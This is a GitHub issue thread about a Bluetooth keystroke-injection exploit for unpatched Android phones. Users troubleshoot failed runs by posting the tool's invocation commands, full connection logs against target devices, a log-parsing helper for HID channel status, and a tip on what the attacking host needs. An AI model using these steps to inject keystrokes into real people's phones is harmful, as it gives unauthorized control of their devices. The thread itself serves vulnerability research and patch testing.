marcnewlin / hi_my_name_is_keyboard

BSD 2-Clause "Simplified" License

Not working on unpatched devices #1

Open chris-152 opened 8 months ago

chris-152 commented 8 months ago

Hi Marc, for me this doesn't work on either of my unpatched Android phones. On the phones it will show a passcode, but even when accepting this nothing happens. The script tells me that there's an invalid argument (Errno 22). I was wondering if you maybe knew what this means.

pentestfunctions commented 7 months ago

I have been working on a fun implementation of this you can check out and tweak to see if it can help you. https://github.com/pentestfunctions/BlueDucky

Just a side note, are you using the file in the correct folder from the GitHub repo? If it is showing a passcode it either means it might be 'patched', as in the device is a weird older variety like I have found with NZ Vodafone phones (not updated since 2016), or the keyboard.xml file for configuring and setting up is not being read correctly.

Let me know how it goes with my github code as it is.

chris-152 commented 7 months ago

Thanks man, will check it out! Could indeed be some patched version, but it was on Android 9. It was a Motorola phone however, so maybe they have some special implementation. I'll look into it some more, thanks for your reply!

Smankusors commented 7 months ago

this is interesting...

I own Android 7, 9, 10, and 11, but this exploit only works on 10 and 11... 🤔

salamsajid commented 7 months ago

I tried performing the same on Xiaomi, OnePlus and Motorola 11, 12, 13 which have a security patch prior to June 2023, so every time I'm running this it's triggering the Passkey for Pairing and is not able to perform the pairing automatically and keeps on showing error connecting ...... Maybe I'm missing something, or someone can tell me on which devices it worked for them.

sfncat commented 6 months ago

My test environment is Kali Linux:

```
Linux kali 6.5.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09) x86_64 GNU/Linux
```

Bluetooth adapter:

```
Bus 001 Device 030: ID 0a12:0001 Cambridge Silicon Radio, Ltd Bluetooth Dongle (HCI mode)
```

TEST STEPS, on kali:

```
sudo hciconfig hci0 down
sudo hciconfig hci0 up
sudo ./keystroke-injection-android-linux.py -i hci0 -t f0:5c:77:b9:ad:df
```

On Android: Settings, open Bluetooth, open detected.

I tried on Android 10 (Pixel 4 XL), Android 11 (Pixel 5), Android 8 (Honor 6X) and Android 6 (Huawei Mate S). On these models, all trigger the Passkey for Pairing, like this:

```
─$ sudo ./keystroke-injection-android-linux.py -i hci0 -t 00:9A:CD:05:19:29
[2024-02-21 10:55:43.961] executing 'sudo service bluetooth restart'
[2024-02-21 10:55:44.551] configuring Bluetooth adapter
[2024-02-21 10:55:44.553] calling RegisterProfile
[2024-02-21 10:55:44.554] running dbus loop
[2024-02-21 10:55:44.734] executing 'sudo hciconfig hci0 name Hi, My Name is Keyboard'
[2024-02-21 10:55:44.744] executing 'hciconfig hci0 name'
[2024-02-21 10:55:44.763] executing 'sudo hciconfig hci0 class 0x002540'
[2024-02-21 10:55:44.773] executing 'hciconfig hci0 class'
[2024-02-21 10:55:44.775] executing 'hcitool name 00:9A:CD:05:19:29'
[2024-02-21 10:55:46.054] connecting to SDP
[2024-02-21 10:55:46.055] connecting to 00:9A:CD:05:19:29 on port 1
[2024-02-21 10:55:47.881] SUCCESS! connected on port 1
[2024-02-21 10:55:47.881] executing 'sudo btmgmt --index hci0 io-cap 1'
[2024-02-21 10:55:47.889] executing 'sudo btmgmt --index hci0 ssp 1'
[2024-02-21 10:55:47.898] connected to SDP (L2CAP 1) on target
[2024-02-21 10:55:47.902] 'NoInputNoOutput' pairing-agent is running
[2024-02-21 10:55:48.149] connecting to 00:9A:CD:05:19:29 on port 19
[2024-02-21 10:55:50.149] ERROR connecting on port 19: timed out
[2024-02-21 10:55:50.149] connecting to 00:9A:CD:05:19:29 on port 17
[2024-02-21 10:55:52.151] ERROR connecting on port 17: timed out
[2024-02-21 10:55:52.152] connecting to HID Interrupt
[2024-02-21 10:55:52.152] connecting to 00:9A:CD:05:19:29 on port 19
[2024-02-21 10:55:54.153] ERROR connecting on port 19: timed out
[2024-02-21 10:55:54.153] connecting to HID Interrupt
```

Android 4.4.2 (Nubia) can connect on ports 1, 17 and 19, but fails on send_keyboard_report:

```
└─$ sudo ./keystroke-injection-android-linux.py -i hci0 -t 98:6C:F5:96:A0:70
[2024-02-21 10:53:26.691] executing 'sudo service bluetooth restart'
[2024-02-21 10:53:27.301] configuring Bluetooth adapter
[2024-02-21 10:53:27.302] calling RegisterProfile
[2024-02-21 10:53:27.303] running dbus loop
[2024-02-21 10:53:27.481] executing 'sudo hciconfig hci0 name Hi, My Name is Keyboard'
[2024-02-21 10:53:27.491] executing 'hciconfig hci0 name'
[2024-02-21 10:53:27.510] executing 'sudo hciconfig hci0 class 0x002540'
[2024-02-21 10:53:27.522] executing 'hciconfig hci0 class'
[2024-02-21 10:53:27.524] executing 'hcitool name 98:6C:F5:96:A0:70'
[2024-02-21 10:53:28.798] connecting to SDP
[2024-02-21 10:53:28.798] connecting to 98:6C:F5:96:A0:70 on port 1
[2024-02-21 10:53:29.877] SUCCESS! connected on port 1
[2024-02-21 10:53:29.877] executing 'sudo btmgmt --index hci0 io-cap 1'
[2024-02-21 10:53:29.885] executing 'sudo btmgmt --index hci0 ssp 1'
[2024-02-21 10:53:29.893] connected to SDP (L2CAP 1) on target
[2024-02-21 10:53:29.898] 'NoInputNoOutput' pairing-agent is running
[2024-02-21 10:53:30.145] connecting to 98:6C:F5:96:A0:70 on port 19
[2024-02-21 10:53:32.073] ERROR connecting on port 19: [Errno 22] Invalid argument
[2024-02-21 10:53:32.073] connecting to 98:6C:F5:96:A0:70 on port 17
[2024-02-21 10:53:32.209] SUCCESS! connected on port 17
[2024-02-21 10:53:32.209] connecting to HID Interrupt
[2024-02-21 10:53:32.209] connecting to 98:6C:F5:96:A0:70 on port 19
[2024-02-21 10:53:32.429] SUCCESS! connected on port 19
[2024-02-21 10:53:32.429] connected to HID Interrupt (L2CAP 19) on target
[2024-02-21 10:53:32.429] connected to HID Control (L2CAP 17) on target
Traceback (most recent call last):
  File "", line 3, in send
_bluetooth.error: (107, 'Transport endpoint is not connected')

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/kali/workspace/github/hi_my_name_is_keyboard/./keystroke-injection-android-linux.py", line 82, in
    client.send_keyboard_report()
  File "/home/kali/workspace/github/hi_my_name_is_keyboard/injector/client.py", line 119, in send_keyboard_report
    self.c19.send(keyboard_report(*args))
  File "/home/kali/workspace/github/hi_my_name_is_keyboard/injector/client.py", line 32, in send
    raise ex
  File "/home/kali/workspace/github/hi_my_name_is_keyboard/injector/client.py", line 27, in send
    self.sock.send(data)
  File "", line 5, in send
bluetooth.btcommon.BluetoothError: [Errno 107] Transport endpoint is not connected
```
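A small triage helper for the two transcripts above, added here as an example and not part of hi_my_name_is_keyboard: it parses the tool's log lines and reports, per L2CAP port, whether the channel ended up connected, so a tester can tell the Pixel case (HID Control 17 and HID Interrupt 19 both timed out) from the Nubia case (all channels open, failure only at send). The sample logs are constructed from lines posted above, and the port-to-name mapping is the one the tool prints itself.

```python
import re

# Constructed samples, cut down to the lines that matter from the two transcripts
# above (same message format the tool prints; timestamps and addresses as posted)
OLD_DEVICE_LOG = """\
[2024-02-21 10:53:28.798] connecting to 98:6C:F5:96:A0:70 on port 1
[2024-02-21 10:53:29.877] SUCCESS! connected on port 1
[2024-02-21 10:53:30.145] connecting to 98:6C:F5:96:A0:70 on port 19
[2024-02-21 10:53:32.073] ERROR connecting on port 19: [Errno 22] Invalid argument
[2024-02-21 10:53:32.073] connecting to 98:6C:F5:96:A0:70 on port 17
[2024-02-21 10:53:32.209] SUCCESS! connected on port 17
[2024-02-21 10:53:32.209] connecting to 98:6C:F5:96:A0:70 on port 19
[2024-02-21 10:53:32.429] SUCCESS! connected on port 19
"""
PATCHED_DEVICE_LOG = """\
[2024-02-21 10:55:46.055] connecting to 00:9A:CD:05:19:29 on port 1
[2024-02-21 10:55:47.881] SUCCESS! connected on port 1
[2024-02-21 10:55:48.149] connecting to 00:9A:CD:05:19:29 on port 19
[2024-02-21 10:55:50.149] ERROR connecting on port 19: timed out
[2024-02-21 10:55:50.149] connecting to 00:9A:CD:05:19:29 on port 17
[2024-02-21 10:55:52.151] ERROR connecting on port 17: timed out
"""

# L2CAP PSMs as the tool itself labels them in its output
PSM_NAMES = {1: "SDP", 17: "HID Control", 19: "HID Interrupt"}

ATTEMPT_RE = re.compile(r"\] connecting to \S+ on port (\d+)$")
OK_RE = re.compile(r"\] SUCCESS! connected on port (\d+)$")
ERR_RE = re.compile(r"\] ERROR connecting on port (\d+): (.+)$")


def summarize(log_text):
    """Map each L2CAP port to its name, attempt count, final result and error strings."""
    summary = {}
    for line in log_text.splitlines():
        if m := ATTEMPT_RE.search(line):
            psm = int(m.group(1))
            entry = summary.setdefault(psm, {"name": PSM_NAMES.get(psm, "unknown"),
                                             "attempts": 0, "result": "failed", "errors": []})
            entry["attempts"] += 1
        elif m := OK_RE.search(line):
            summary[int(m.group(1))]["result"] = "connected"   # a later success overrides an earlier error
        elif m := ERR_RE.search(line):
            summary[int(m.group(1))]["errors"].append(m.group(2))
    return summary


def hid_channels_open(summary):
    """True only if both HID channels (control 17, interrupt 19) ended up connected."""
    return all(summary.get(p, {}).get("result") == "connected" for p in (17, 19))
```

Run `summarize()` on the tool's stdout saved to a file; when `hid_channels_open()` is False the device refused the HID channels, and when it is True but the run still fails the problem is downstream, at the report send, as in the Nubia trace.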

Neowizard commented 3 months ago

> I tried performing the same on Xiaomi, OnePlus and Motorola 11, 12, 13 which have a security patch prior to June 2023, so every time I'm running this it's triggering the Passkey for Pairing and is not able to perform the pairing automatically and keeps on showing error connecting ...... Maybe I'm missing something, or someone can tell me on which devices it worked for them.

I believe it's not enough for just the phone to be unpatched; the attacking machine (e.g. Linux/BlueZ) must also support unauthenticated connections.